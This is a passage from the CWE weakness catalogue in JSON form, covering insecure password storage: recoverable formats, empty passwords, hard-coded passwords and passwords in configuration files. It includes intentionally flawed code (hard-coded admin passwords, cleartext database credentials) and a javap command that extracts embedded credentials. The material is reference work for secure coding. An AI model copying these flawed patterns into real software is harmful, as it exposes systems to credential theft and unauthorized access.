Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Plaintext Storage","attr":{"@_Date":"2008-01-30"}},{"#text":"Plaintext Storage of a Password","attr":{"@_Date":"2018-01-23"}},{"#text":"Plaintext Storage of a Password","attr":{"@_Date":"2018-03-27"}},{"#text":"Unprotected Storage of Credentials","attr":{"@_Date":"2021-07-20"}}]}},"257":{"attr":{"@_ID":"257","@_Name":"Storing Passwords in a Recoverable Format","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The storage of passwords in a recoverable format makes them subject to password reuse attacks by malicious users. In fact, it should be noted that recoverable encrypted passwords provide no significant benefit over plaintext passwords since they are subject not only to reuse by malicious attackers but also by malicious insiders. If a system administrator can recover a password directly, or use a brute force search on the available information, the administrator can use the password on other accounts.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"259","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control"],"Impact":"Gain Privileges or Assume Identity","Note":"User\'s passwords may be revealed."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Revealed passwords may be reused elsewhere to impersonate the users in question."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use strong, non-reversible encryption to protect stored passwords."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-59"},"Intro_Text":"Both of these examples verify a password by comparing it to a stored compressed version.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"#text":"if (strcmp(compress(password), compressed_password)) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (passwd.Equals(compress(password), compressed_password)) {}return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return(0);","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""],"xhtml:i":"//Diagnostic Mode"}}}],"Body_Text":"Because a compression algorithm is used instead of a one way hashing algorithm, an attacker can recover compressed passwords stored in the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...<connectionStrings></connectionStrings>...","xhtml:br":["",""],"xhtml:div":{"#text":"<add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" />","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Storing passwords in a recoverable format"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"49"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"#text":"The meaning of this entry needs to be investigated more closely, especially with respect to what is meant by \\"recoverable.\\"","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes"}]}},"258":{"attr":{"@_ID":"258","@_Name":"Empty Password in Configuration File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Using an empty string as a password is insecure.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"260","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"521","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Passwords should be at least eight characters long -- the longer the better. Avoid passwords that are in any way similar to other passwords you have. Avoid using words that may be found in a dictionary, names book, on a map, etc. Consider incorporating numbers and/or punctuation into your password. If you do use common words, consider replacing letters in that word with numbers and punctuation. However, do not use \\"similar-looking\\" punctuation. For example, it is not a good idea to change cat to c@t, ca+, (@+, or anything similar. Finally, it is never appropriate to use an empty string as a password."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but the password is provided as an empty string.","Body_Text":["This Java example shows a properties file with an empty password string.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database and the password is provided as an empty string.","An empty string should never be used as a password as this can allow unauthorized access to the application. Username and password information should not be included in a configuration file or a properties file in clear text. If possible, encrypt this information and avoid CWE-260 and CWE-13."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...<connectionStrings><add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /></connectionStrings>...","xhtml:br":["","","",""]}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management: Empty Password in Configuration File"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-207"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"259":{"attr":{"@_ID":"259","@_Name":"Use of Hard-coded Password","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains a hard-coded password, which it uses for its own inbound authentication or for outbound communication to external components.","Extended_Description":{"xhtml:p":["A hard-coded password typically leads to a significant authentication failure that can be difficult for the system administrator to detect. Once detected, it can be difficult to fix, so the administrator may be forced into disabling the product entirely. There are two main variations:","In the Inbound variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cannot be changed or disabled by system administrators without manually modifying the program, or otherwise patching the software. If the password is ever discovered or published (a common occurrence on the Internet), then anybody with knowledge of this password can access the product. Finally, since all installations of the software will have the same password, even across different organizations, this enables massive attacks such as worms to take place.","The Outbound variant applies to front-end systems that authenticate with a back-end service. The back-end service may require a fixed password which can be easily discovered. The programmer may simply hard-code those back-end credentials into the front-end software. Any user of that program may be able to extract the password. Client-side systems with hard-coded passwords pose even more of a threat, since the extraction of a password from a binary is usually very simple."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Inbound: the software contains an authentication mechanism that checks for a hard-coded password.","Outbound: the software connects to another system or component, and it contains hard-coded password for connecting to that component."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"321","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"257","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Architecture and Design"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If hard-coded passwords are used, it is almost certain that malicious users will gain access through the account in question."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"attr":{"@_Detection_Method_ID":"DM-11.6"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and perform a login. Using disassembled code, look at the associated instructions and see if any of them appear to be comparing the input to a fixed string or value."]}}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"For outbound authentication: store passwords outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible."},{"Phase":"Architecture and Design","Description":"For inbound authentication: Rather than hard-code a default username and password for first time logins, utilize a \\"first login\\" mode that requires the user to enter a unique strong password."},{"Phase":"Architecture and Design","Description":"Perform access control checks and limit which entities can access the feature that requires the hard-coded password. For example, a feature might only be enabled through the system console instead of through a network connection."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For inbound authentication: apply strong one-way hashes to your passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the file/database still requires the attacker to try to crack the password. When receiving an incoming password during authentication, take the hash of the password and compare it to the hash that you have saved.","Use randomly assigned salts for each separate hash that you generate. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":"For front-end to back-end connections: Three solutions are possible, although none are complete.","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["The first suggestion involves the use of generated passwords which are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals.","Next, the passwords used should be limited at the back end to only performing actions valid for the front end, as opposed to having full access.","Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay style attacks."]}}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-13"},"Intro_Text":"The following code uses a hard-coded password to connect to a database:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...DriverManager.getConnection(url, \\"scott\\", \\"tiger\\");...","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"javap -c ConnMngr.class","xhtml:div":{"#text":"22: ldc #36; //String jdbc:mysql://ixne.com/rxsql24: ldc #38; //String scott26: ldc #17; //String tiger","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}],"Body_Text":"This is an example of an external hard-coded password on the client-side of a connection. This code will run successfully, but anyone who has access to it will have access to the password. Once the program has shipped, there is no going back from the database user \\"scott\\" with a password of \\"tiger\\" unless the program is patched. A devious employee with access to this information can use it to break into the system. Even worse, if attackers have access to the bytecode for application, they can use the javap -c command to access the disassembled code, which will contain the values of the passwords used. The result of this operation might look something like the following for the example above:"},{"attr":{"@_Demonstrative_Example_ID":"DX-14"},"Intro_Text":"The following code is an example of an internal hard-coded password in the back-end:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (strcmp(password, \\"Mew!\\")) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0)","xhtml:br":""}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (!password.equals(\\"Mew!\\")) {}//Diagnostic Modereturn(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return(0)","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}}}],"Body_Text":"Every instance of this program can be placed into diagnostic mode with the same password. Even worse is the fact that if this program is distributed as a binary-only distribution, it is very difficult to change that password or disable this \\"functionality.\\""},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...<connectionStrings></connectionStrings>...","xhtml:br":["",""],"xhtml:div":{"#text":"<add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" />","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management: Hard-Coded Password"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Use of hard-coded password"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC03-J","Entry_Name":"Never hard code sensitive information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP33","Entry_Name":"Hardcoded sensitive data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 19: Use of Weak Password-Based Systems." Page 279"}}]},"Notes":{"Note":{"#text":"This entry could be split into multiple variants: an inbound variant (as seen in the second demonstrative example) and an outbound variant (as seen in the first demonstrative example). These variants are likely to have different consequences, detectability, etc. More importantly, from a vulnerability theory perspective, they could be characterized as different behaviors.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-13","Modification_Comment":"Significant description modifications to emphasize different variants."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Description, Detection_Factors, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Hard-Coded Password","attr":{"@_Date":"2010-02-16"}}}},"260":{"attr":{"@_ID":"260","@_Name":"Password in Configuration File","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software stores a password in a configuration file that might be accessible to actors who do not know the password.","Extended_Description":"This can result in compromise of the system for which the password is used. An attacker could gain access to this file and learn the stored password or worse yet, change the password to one of their choosing.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Avoid storing passwords in easily accessible locations."},{"Phase":"Architecture and Design","Description":"Consider storing cryptographic hashes of passwords as an alternative to storing in plaintext."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Below is a snippet from a Java properties file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"webapp.ldap.username = secretUsernamewebapp.ldap.password = secretPassword","xhtml:br":""}},"Body_Text":"Because the LDAP credentials are stored in plaintext, anyone with access to the file can gain access to the resource."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...<connectionStrings></connectionStrings>...","xhtml:br":["",""],"xhtml:div":{"#text":"<add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" />","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management: Password in Configuration File"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-207"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content 